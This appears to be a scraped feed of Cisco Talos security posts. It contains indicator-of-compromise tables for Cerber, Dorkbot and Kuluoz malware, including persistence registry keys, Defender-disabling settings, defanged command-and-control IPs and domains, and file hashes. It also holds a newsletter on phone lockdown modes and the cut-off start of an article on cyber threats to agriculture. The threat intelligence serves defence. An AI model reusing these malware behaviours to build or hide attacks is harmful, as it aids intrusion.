b863d3d875966054e0a8a19ae649a08ecf80a2be46b937c5f6d0a634cba4e465 ce88fb263d3e6a38cac9d2b4ec0f27bfc724d46b4d274fc7adb25330bae9e724 daf4c0820c45f6be84cf248504e10bfee063ea6fc8de3b397adaa6682e4bb610 e06d33553621160bf21cdc08eaecb5e977a59e6e416c37922a6d263620141a7d fa0ddfe8dd1e9509529086469444221a673fb0d16f380c968150a7a53f68b0d9

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          This has coverage
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.Cerber-9964084-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-1
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-2
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-4
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-3
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-100
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-101
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-102
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-103
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-100
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-101
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-102
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-103
26
<HKCU>\SOFTWARE\MICROSOFT\SPEECH\CURRENTUSERLEXICON\\FILES 1
<HKCU>\SOFTWARE\MICROSOFT\SPEECH\CURRENTUSERLEXICON\\FILES
Value Name: Datafile
1
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]128[.]255[.]179 26
149[.]202[.]64[.]0/27 26
149[.]202[.]122[.]0/27 26
149[.]202[.]248[.]0/22 26
172[.]66[.]41[.]18 15
104[.]20[.]21[.]251 11
172[.]66[.]42[.]238 11
172[.]67[.]2[.]88 8
104[.]20[.]20[.]251 7
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]blockcypher[.]com 26
bitaps[.]com 26
chain[.]so 26
btc[.]blockr[.]io 26
xxxxxxxxxxxxxxxx[.]1k1dxt[.]top 26
Files and/or directories created Occurrences
%TEMP%\d19ab989 26
%TEMP%\d19ab989\4710.tmp 26
%TEMP%\d19ab989\a35f.tmp 26
%LOCALAPPDATA%\Microsoft\Office\Groove1\System\CSMIPC.dat 26
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 26
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 26
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.hta 26
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.txt 26
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.jpeg 26

File Hashes

07d1b61970c982a009d3d3bd455b1ce6628819fbe47cf82d35b3b2d83a6b1690 097a210c11bc3b1d1768d92e0f080382f350da4116177c38bd81ecaf01bf252f 1015da0524bf981e3f7da09097e695418d2aeb20c8dfc027e927ea274c927743 1a201ba2922601f743606e4f8762e042355fb95704ae08f1e9d46539e9a9c53e 24eb2bfa038ccf1002d6c67bb35241514e265dda1e7ed5e310602e385cb942bd 2788aeb4b8ce3220bc2352ecf6f6dc6fc899934691e5f7778c160d43a654c752 2b921630e3606ceded2567dd7c2665ff59d3894e8f17b0c4c515cfcfea9281f6 2c56f82b2109c74ffc9ac8bb6a75a4fadc7b5dbc8c6e4973dc576b4f6e44b3fd 3107cfd1631d01d58fe6bcfddf6bb649286ee1e4632a2f6da9e0522e72adf66c 313a8059da3a543dc1615e4b0e08d9b6ba02b82a915811bed92ec41a6b282cd5 404b2ca147b0fd48ad897ae91ec951500eac740d3641552ed2175075eccd3d91 405cda0e472fc0c7ea7bd7f523bf1eb77c020a68f895d28d8300ecbcaf689dd7 4fae94bd1def53411ff126fcc1b5e91d25f5b42bc0792df01721217194d5cad1 5490d8d2dd89b8298b5a7b5954f30157c40e4a9e7a13e89b3678169b274190c4 614458dcdaebfaf39ac96fef19b98813852061b7f049c332d1a7d96099ec9971 661992c14354d9a884da5c0d354ec2722aa2d4bc7c6c088e9fbea1781408a48d 6660f96c1b098447cb40ac571cb3301e62dab35ed7d603a262e824c55ec0e2ba 673175cc9fc60fed6f87badae959858cc73317e497bbc63be01d412538d8cd4a 6ac22f719648c97dafca9980c3b2cc4d20c65411be0f3823eb5fbd2ad9907935 746617c675d2a770eab8c726ebc402418cebdbb8200734454baadd99caddf189 74f331f2928d6577c9d0767cbb16f5e19cdd9db4302b1f853b02de01e7797eaa 761c6d04388582f39dcb4e11253bd2e05690bee6f1f5ed960dac7b2121946e7f 763c7dd7964eaf334f7840f0b1c73340890b358f2e0892e455cb58b262828716 76578d8841dc939a7eaafb0740943988f084d18871e5e82d88a8474945c290a0 807ab02bc36e5465e67956df8cd09cd0f6baa69e99c80729eef0ef8a486da894
*See JSON for more IOCs

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          This has coverage
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Dorkbot-9964085-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: ShowSuperHidden
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: Load
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 1081297374
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 1081297374
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Taskman
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Shell
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update Manager
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 6
<HKCU>\SOFTWARE\UAZI SOFT
Value Name: UaziVer
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Live Installer
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Windows Live
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Live
5
<HKCU>\SOFTWARE\UAZI SOFT 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: BCSSync
5
Mutexes Occurrences
PuredairyBB9 6
PuredairyBB10 6
PuredairyBB2 6
PuredairyBB4 6
PuredairyBB8 6
PuredairyBB7 6
PuredairyBB6 6
PuredairyBB15 6
PuredairyBB14 6
PuredairyBB13 6
PuredairyBB12 6
PSPSndkvsdvd0199201 6
PuredairyBB1 6
PuredairyBB5 6
PuredairyBB3 6
PuredairyBB16 6
PuredairyBB17 6
PuredairyBB18 6
PuredairyBB22 6
PuredairyBB20 6
PuredairyBB21 6
PuredairyBB19 6
PuredairyBB29 6
PuredairyBB31 6
PuredairyBB23 6
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
20[.]112[.]52[.]29 7
109[.]236[.]82[.]19 6
80[.]82[.]64[.]8 6
93[.]190[.]140[.]103 6
109[.]236[.]82[.]142 6
109[.]236[.]88[.]101 6
94[.]102[.]52[.]22 6
109[.]236[.]88[.]161 6
93[.]190[.]139[.]14 6
217[.]23[.]14[.]136 6
94[.]102[.]52[.]19 6
217[.]23[.]8[.]142 6
109[.]236[.]86[.]119 6
93[.]190[.]140[.]141 6
108[.]59[.]2[.]221 6
109[.]236[.]83[.]12 6
80[.]82[.]65[.]207 6
217[.]23[.]3[.]105 6
217[.]23[.]4[.]220 6
93[.]190[.]140[.]113 6
217[.]23[.]9[.]104 6
93[.]190[.]142[.]191 6
94[.]102[.]51[.]231 6
217[.]23[.]7[.]3 6
80[.]82[.]65[.]199 6
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
microsoft[.]com 7
faumoussuperstars[.]ru 5
powerrembo[.]ru 5
europe[.]pool[.]ntp[.]org 2
go[.]microsoft[.]com 1
www[.]msn[.]com 1
north-america[.]pool[.]ntp[.]org 1
maps[.]pilenga[.]mobi 1
hostnamessimply1[.]effers[.]com 1
apps[.]audimobile[.]info 1
bootstrap4cache[.]com 1
Files and/or directories created Occurrences
%APPDATA%\WindowsUpdate 11
%ProgramData%\msodtyzm.exe 7
\RECYCLER 6
\TEMP\C\UPDATE 6
%APPDATA%\WindowsUpdate\MSupdate.exe 6
%TEMP%\temp41.tmp 5
%APPDATA%\WindowsUpdate\Live.exe 5
%TEMP%\apiSoftCA 5
%APPDATA%\Windows Live 5
%APPDATA%\Windows Live\debug_cache_dump_2384394.dmp 5
%APPDATA%\Windows Live\pldufejsya.exe 5
\RECYCLER\S-1-5-21-0243556031-888888379-781862338-18611771 5
%APPDATA%\fcvifgrs 1
%APPDATA%\fcvifgrs\jisgivdt.exe 1
\RECYCLER\S-1-5-21-0243556031-888888379-781862338-1861771 1
%ProgramData%\3741550053 1
%ProgramData%\3741551629 1
%ProgramData%\3741549335 1
%ProgramData%\3741546871 1
%ProgramData%\3741543454 1
%ProgramData%\3741548555 1
%ProgramData%\3741550771 1

File Hashes

0ce367d545da1ed522fe364fdafc4bf39f1aa9aa326d0413c104132464c4b0f5 0ff57cf4b79588ba6c721f78a042e79a8c4e4eb6544dad9147c6918efc0a9bfd 1487cbb9c1025017bf767b8f9feab2bcdd9f500cd4bed79ca334c4eda4df1d71 1a15e5ebecd8f3025b89a1ee2149311bd0883bc62928092980604cecddf5718f 1c21c85c814609bc6db76824eda6333b2d26be11f8736bbb7397e97ad95c9f2e 1d0d652abf31a5b4f9ecf5ee6d201b4d31e977f6fc769a34cd34a5468e362e14 1e358ccc5c00767b2d7518ad5b34639c172a33118f691b6e989c0da4a4067781 29e771b03f40a6cd492b49826238364933a37c65bee5bf7990d711ff14d3511e 2bbac09df0fbb667c042f25c8d4810a08d6a3129a57ec70363debad39f917bd2 32ac146ea9c7899e04a57c42d48407468323b46a40462febfb0453e27466ed11 3ab978d7ba8cadbfa40ce0d1b6acb6922d6f7b2d8322f420bf03db0c44d94755 4faa3a69a429a598863c9369d0b4d572fa01b5bbf567b0d76f5a42f596430003 57d6deb95dad820da83a96f691230e6927f02bd7dc81fd22117a84ce1ff983b1 84055ce5bc4ef2bdf486e82e444e5665c73f4fe627a8734edc463b59f443bfcc 90853a92441d02881129621868f5a83d4fda693e6602a043dae622186b654a0d 90b11cecdac4d67db66c36a3f692361425eaf99c3f243c107e884091d209ee8b 94b5e03c8c149c8065dcf1a3696ca0c0801f6932e3a6b73985081dd36bb04194 9bf72ac43dcab3750686c49abbf1b0835505186a37187b6435539ea871dfd829 adbbf9cf8048f45fce2ad9fb1d681ea9334813a442d6d5b051cd11285fc71154 af69bafe28d0df36ddba5768583cf25bd5cae24b312e17f607c77294b731f0dd b478d67b97fa15e88d047c643232590d1c6c2d2179e330df5bdc78c4e56036ee b7d2ff1e59e0d30e46adf03d7a90dcc0ed83f2ff1e9b35702a70486954f1d3dd c254f12058d6367578b877c09bd219abcc583003db8d15d270ab284bad923234 caf84844a5809c4e1c513299792f95ca26a87c40dc70627e8bddf5b65775206e d401626e94cd830c3037cec51863d3315a97daf17c16f0836914a8ff8424213f
*See JSON for more IOCs

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          N/A
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Worm.Kuluoz-9964104-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\TKQJXHIR
Value Name: nnagtvkf
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iemwudbv
2
<HKCU>\SOFTWARE\PKBQSDOK
Value Name: wfiqbttr
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: deiobboq
2
<HKCU>\SOFTWARE\TEFAPJXX
Value Name: hjlkqasv
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nmvftwdp
2
<HKCU>\SOFTWARE\ROHCSWFU
Value Name: ivxesusr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rskaarvw
1
<HKCU>\SOFTWARE\ONFHUPBQ
Value Name: qrlpghvv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: dwxwetxw
1
<HKCU>\SOFTWARE\JUNLDJNI
Value Name: paxvvuef
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: buwqaweo
1
<HKCU>\SOFTWARE\QPANUOIR
Value Name: mmvjkbpj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lawgdaar
1
<HKCU>\SOFTWARE\IDIFICQU
Value Name: uqiuudaf
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: uaugufwr
1
<HKCU>\SOFTWARE\EPCSQSNO
Value Name: sdkgxoqv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nojriosh
1
<HKCU>\SOFTWARE\IIBPNATQ
Value Name: qbmgekoa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tabswxsd
1
<HKCU>\SOFTWARE\CHUFRWHS
Value Name: nhmwllub
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: kawalexr
1
<HKCU>\SOFTWARE\QDCTDCFM
Value Name: ietjtgir
1
<HKCU>\SOFTWARE\JUOBFMWV
Value Name: ucngtfoi
1
Mutexes Occurrences
2GVWNQJz1 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
91[.]196[.]126[.]16 21
88[.]198[.]25[.]17 20
173[.]203[.]113[.]44 19
178[.]33[.]162[.]8 18
176[.]31[.]106[.]226 18
74[.]50[.]60[.]116 18
198[.]24[.]142[.]66 17
Files and/or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

0828aee088e7c191c463dac5a2449474da1b106da5e12b6335f61d2dd3ae320e 0ddf461f926f814d19696d3851f3673c10d69a15fa2d7cfac9552c3af9460c66 12b274776143da76ceea8cfc1b8219535bca09dea1ea6059a48e74dd6a78e80d 160999be2e3f124a106ced958bce6b6f94fbc3645895aa0129e4dedb443011d7 21245351ac8d14c31552d46c0f8ceec6d576a1abae0ab3d5131e25e9e8fefe32 23fec3f833e9a7ee790ea9cad1b205ade2036466282654b2e53f23516553b775 24e1fb11b1c63caf42bc0a9d8df57cb1c84ccb11415f01c56de128d6ceb2ea4e 2bf5a6f99c57bcaddd28a0a8dad595686b9a660843cd4037575d4abb82af8f69 32a01832f4de0f17e438fed6be9f155d9fd30056133681c7474f0114a1731a9b 35a4fe74474b4f7e7f9c777d063097e36a16f509bc3afb9579779c0504b73af4 3a3fae86a4e14a7d50b6c5bc5d78dc12745fa53d240df641e1fc311449368c85 3da619fa973717201422faf7329016a266b27b89f8a39416cac203f75f32259a 405d7737a27f0798b16f85939c3eacfcbe9e5305b4c621dd20bcaffbe994d88f 413f4fcae50cdad66f08e0e3ae083e60e18e54f890492fcd0241deb9dfe81b81 44d0507ee9143aa548ae8a03171b27633f4226abbad172a0456194a2ef2eb507 44d1449c19d3f79a3fe21e2ab9d333a1bea4156565a3106fc2203ccefa869a9b 4979dce8592c0d16bdc6228b9741ef6c315e3bb1ff34de14271fb3499cd0f139 4b7891ed58a08b45b576282afd74fe835845cd4be8c5aab467ad09136e87ec8e 4bc8eb3d2e72a44384b3d824b33a971ace9eae20998dfe8bdd2ab9b9267b5b43 4c6528d000e07485c69f1c32a95967a454fd20864a4ad2c062160d99987822ef 50c108f9fc31557d55216dfe28b9eeac15fe5f1175a089ff196e1129d6ddf593 5730f9ce8c84e6f1c153c247146ac1590fd989a73cdc9dce9d67594b33caf354 5a45837812962153f5d480918eab77093394dd41c45c610ffd142461ab433668 5e37715cc8a5d1b6c5bed437eea25da495285bb1386cf2aef2b5484fd6c30e69 5ee4adead518246dc926545a0d28e1a488f04d530c49591cc788a8e2b360ad89
*See JSON for more IOCs

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          This has coverage
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Threat Source newsletter (Aug. 18, 2022) — Why aren't Lockdown modes the default setting on phones?

18 August 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

As the data privacy landscape gets increasingly murky, app developers and device manufacturers are finding new ways to shore up users’ personal information. Of course, all users have to do is go out of their way to opt in.

Apple recently announced a new Lockdown Mode for the iOS operating system that powers the company’s iPhones. When enabled, it turns off many of the features that attackers exploit when targeting a mobile device with spyware. Spyware, particularly the NSO Group’s Pegasus tool, is a growing concern across the world.

With Lockdown Mode enabled, a hypothetical attacker would not have access to certain functions on the phone, and it blocks access to important APIs such as speech and facial recognition, which research has shown are relatively easy to bypass.

In a review of Lockdown Mode, Zack Whittaker of TechCrunch said, “...we didn’t find using our iPhone in Lockdown Mode to be overly prohibitive or frustrating as thought when the feature was first announced.”

Android has had its own version of this since 2018, which only lets users turn on a Lockdown Mode that disables their device’s fingerprint reader and facial ID scan, so they can log in using only a PIN, password or pattern. However, this feature is turned off immediately after the user successfully logs in again and must be manually re-enabled every time.

Some individual apps have taken their own steps, like the menstrual cycle-tracking app Flo, which recently announced a new Anonymous Mode that allows users to completely remove their personal data from the app.  

These features should become not only the norm, but the default. Much like browser cookies are now thanks to the GDPR, users should have to opt out of these types of modes rather than opting in. I’m skeptical that will ever happen, but if device and app manufacturers are serious about protecting users’ data, users should instead have to tell the device “Yes, I want to use the fingerprint reader and take on the inherent risk” or “Yes, I don’t care if you sell my data to third-party advertisers.”

Right now, these features are buried in a few layers of settings menus, and in the case of Android, it’s not even a permanent change.  

Some startups are trying to solve this problem by going back to the era of “dumb” phones, like The Light Phone, which doesn’t have any web browsing features, or the Mudita Minimalist phone, which pretty much only makes calls, sends text messages and plays music.

I’m a hypocrite here, because if one day I was suddenly told I couldn’t check my fantasy football lineups on my phone or didn’t have streaming access to podcasts, I’d probably click whatever big red button there was to turn those features back on. But at the very least, that option should be presented as a big red button and not something you have to Google to figure out how to turn on.

The one big thing 

While not necessarily the most discussed aspect of Russia’s invasion of Ukraine, it’s important to look at how vital Ukrainian farming is to the world’s food supply chain. And as state-sponsored cyber attacks continue against Ukraine, the potential for grain and food shortages in Europe continues to rise. As Joe Marshall points out in our latest blog post, there are several knock-on effects that could happen if Ukraine’s food production and transportation system were to be disrupted by a major security event.  

Why do I care? 

The agriculture sector is highly vulnerable to cyber-attacks given its low downtime tolerance, insufficient cyber defenses, and far-reaching ripple effects of disruption. Potential cyber attacks on this industry could induce things like a slowdown in production, shipping delays, loss of economic value or supply shortages.  

So now what? 

For executive leadership, now is an opportune time to evaluate your accepted business risks. That means taking the time to understand how interconnected your agriculture operations are to your corporate offices. Could you function as a business should a ransomware attack affect you? What investments have you made to build resiliency in your operations? These are incredibly difficult questions to answer. Use the catalyst of global events to invest in technology and more importantly, people, to help you find those answers. Be proactive, and train for climatic events like a cyber attack. 

 

Top security headlines from the week


As many as 1,900 users of the encrypted messaging app Signal could have had their login authentication codes stolen as part of a recent data breach at Twilio. Twilio is a popular gateway other web platforms use to send SMS or voice messages. Signal began notifying users this week of the issue, with one victim saying the attackers used the Twilio access to re-register a new device associated with the user’s phone number, allowing them to send and receive messages from their Signal app. Cloudflare was also a target of the phishing attack, with actors sending users phony text messages warning them their login had been changed, sometimes even contacting the target’s family members. (The Verge, Ars Technica)

Some of the world's top security experts, hackers and defenders unveiled new research at the Black Hat and DEF CON conferences last week. The slate of talks, presentations and exhibits brought to light several high-profile vulnerabilities, including two severe issues in the Zoom video conferencing app. Other heavily discussed topics included the spread of disinformation and election security. In a more lighthearted demonstration, one researcher even showed a way to jailbreak the Linux system on a John Deere tractor to play the video game "Doom" on its center console. (Politico, The Guardian, The Verge)

The U.S. Cybersecurity and Infrastructure Security Agency is warning of an uptick in attacks from the Zeppelin ransomware, specifically against critical infrastructure. Threat actors are buying into the ransomware-as-a-service to spread the malware, using SonicWall firewall and remote desktop protocol vulnerabilities to initially breach targeted networks, according to a new CISA advisory. Zeppelin has a new multi-encryption tactic: once the malware is on a victim's network, it executes the ransomware multiple times and creates different IDs and encrypted file extensions, so the victim can't simply use one decryption key to recover their files. (ThreatPost, CISA)


Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934
MD5: 93fefc3e88ffb78abb36365fa5cf857c
Typical Filename: Wextract
Claimed Product: Internet Explorer
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

MD5: a087b2e6ec57b08c0d0750c60f96a74c
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Kmsauto::1201

MD5: 8c69830a50fb85d8a794fa46643493b2
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201

MD5: 0e4c49327e3be816022a233f844a5731
Typical Filename: aact.exe
Claimed Product: AAct x86
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos

MD5: f1fe671bcefd4630e5ed8b87c9283534
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: PUA.Win.Tool.Hackkms::1201

Ukraine war spotlights agriculture sector's vulnerability to cyber attack

18 August 2022 at 12:00



By Joe Marshall.

  • The war in Ukraine has caused massive problems for global food supplies, underscoring the high impact of disruptive events on agriculture entities and related organizations.
  • The challenges to the Ukrainian agriculture sector imposed by the war--and global ripple effects--have been well-documented and garnered international attention. We judge that the current media spotlight on these issues will motivate cyber threat actors to conduct future attacks on this industry as they realize the consequences of prolonged disruption for related entities and potential leverage they would have over victims.  
  • The agriculture sector is highly vulnerable to cyber-attacks given its low downtime tolerance, insufficient cyber defenses, and the far-reaching ripple effects of disruption. We assess that future threats to the agriculture sector will mainly include financially motivated ransomware actors and disruptive attacks carried out by state-sponsored APTs.
  • Network defenders and leaders should consider their business resiliency in agriculture or agriculture adjacent industries.

For the past six years, Cisco Talos has been actively involved in assisting public and private institutions in Ukraine to defend themselves against state-sponsored actors. Our involvement ranges from commercial and critical infrastructure to election security. Our presence has afforded us unique opportunities and observations about cybersecurity in a macro and micro way.  

Ukraine has been a frequent victim of state-sponsored cyber-attacks aimed at critical infrastructures like power and transportation. Russia’s invasion of Ukraine not only increased the risk to these sectors but also effectively sparked a global food crisis, with the war driving rising prices and scarcity of many essential foods desperately needed by consumers around the world. The exposed fragility of the global food supply chain will also likely have implications for future cyber threats, as adversaries are notorious for targeting vulnerable sectors with low downtime tolerance and insufficient cyber defenses. This was most recently seen in the wave of ransomware attacks against health care entities during the COVID-19 pandemic. 

To truly grasp the implications of the war in Ukraine, we must examine how Ukrainian agriculture feeds the world, the current situation, and what this means for the global cybersecurity posture needed to protect agricultural assets.


Threats to agriculture sector likely to grow with Ukraine war 

Ransomware cartels and their affiliates are actively targeting the agricultural industry. Moreover, these actors have done their homework and are targeting agricultural companies during the two times of the year when they cannot suffer disruptions: planting and harvesting. According to an April 2022 FBI alert, "Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production." Adversaries are known to be shrewd and calculating and understand their victims' weaknesses and industries, key reasons why they are frequently successful in their operations.
 
While we know that the agriculture sector is vulnerable, the war in Ukraine has exacerbated this threat, clearly demonstrating the global consequences of disruptive activity.  The world is already facing several stresses on the global economy and supply chain, including rising costs of food, inflation and the ongoing COVID-19 pandemic. Food insecurity, starvation and additional global unrest are all but assured as the war in Ukraine rages on. To truly grasp the enormity of this, let’s look at Ukraine, a massive global supplier of agriculture and the implications for global agriculture security. 
 

Just how important is Ukraine in global agriculture? 

Ukraine is often referred to as the “Breadbasket of Europe,” and it is a well-earned moniker.  
As of 2021, Ukraine was the sixth-largest exporter of wheat in the world, accounting for 10% of the market share. The country produced 20 million tons of wheat, with Egypt, Indonesia, Turkey, Pakistan and Bangladesh as the primary destinations. Many countries impacted by the ripple effects of the war in Ukraine are already highly vulnerable, particularly those in Africa, the Middle East, and parts of Asia. In Ethiopia, Somalia, and Kenya, the number of people facing extreme hunger has more than doubled since last year. In Afghanistan, humanitarian agencies have warned that the country has been close to famine for months, while Lebanon has been in an economic crisis for over a year. 
 
At home, Ukraine relies heavily on farming as a key source of revenue, with agriculture accounting for more than 20% of the country’s GDP, according to the U.N. Agriculture also provides employment for 14% of Ukraine’s population, according to the U.S. Department of Agriculture. Ukraine is unique in that a large portion of the country's land has incredibly fertile soil, with over half the country having well-suited arable land dedicated to crops like wheat, maize and sunflower. Some may assume that swathes of rich land are all that is necessary to be an agriculture giant, but in truth, one needs a well-laid and maintained infrastructure to move crops, seeds and fertilizer, and robust deep-water oceanic ports that can import and export products quickly. Ukraine has all of these features, but they have been largely disrupted or destroyed in the war.  

Understanding the mess of Ukrainian wartime agriculture

